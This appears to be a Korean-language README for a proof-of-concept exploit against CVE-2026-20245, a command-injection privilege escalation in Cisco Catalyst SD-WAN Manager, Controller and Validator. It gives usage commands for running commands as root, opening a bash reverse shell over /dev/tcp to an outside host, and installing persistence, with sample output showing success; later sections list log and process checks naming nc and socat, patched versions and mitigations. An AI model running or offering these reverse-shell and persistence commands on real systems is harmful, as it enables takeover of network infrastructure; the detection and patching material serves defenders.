
**이 코드는 오직 교육적 목적과 승인된 보안 테스트를 위해서만 사용됩니다.**
이 코드는 교육 목적 및 승인된 보안 테스트에만 사용됩니다.
CVE-2026-20245는 Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage), Cisco Catalyst SD-WAN Validator (vBond)의 CLI에서 권한 상승 취약점입니다. netadmin 권한이 있는 인증된 공격자는 특수하게 조작된 파일을 업로드하여 root로 임의 명령을 실행할 수 있습니다.
| 필드 | 값 |
|---|---|
| CVE | CVE-2026-20245 |
| CVSS | 7.8 (High) |
| 벡터 | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 구성 요소 | CLI / CSV Upload |
| 유형 | Command Injection (CWE-116) |
| 제품 | 취약한 버전 |
|---|---|
| Cisco Catalyst SD-WAN Manager | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 |
# Clone repository
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC
# Install dependencies
pip install -r requirements.txt
# Give permissions
chmod +x exploit.py
txt requests>=2.31.0
# Check version
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
# Execute command
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
# Reverse shell
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
# Install persistence
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
로그 확인 (/var/log/scripts.log)
# 의심스러운 활동 검색
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
# 찾아야 할 특정 명령어
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
의심스러운 파일
/home/admin/*.csv (승인되지 않은 CSV 파일)/tmp/*.csv/var/log/scripts.log 비정상 항목 포함프로세스
# 비정상적인 root 프로세스 검색
ps aux | grep -E "bash|sh|nc|ncat|socat"
| 버전 | 수정 릴리스 |
|---|---|
| 20.18.2.1 이하 | 20.18.3.1 |
# 불필요한 경우 serial number 업로드 비활성화
no feature upload-serial-numbers
# netadmin 권한 제한
admin privilege restrict
| 날짜 | 이벤트 |
|---|---|
| 2026-05-14 | Cisco 초기 권고 발표 |
| 2026-06-04 | CVE 공식 발표 |
| 2026-06-09 | CISA가 KEV에 추가 |
| 2026-06-23 | CISA 패치 마감일 |
이 소프트웨어는 "있는 그대로" 제공되며 보증이 없습니다. 저자는 오용에 대해 책임을 지지 않습니다. 승인된 시스템에서만 사용하십시오.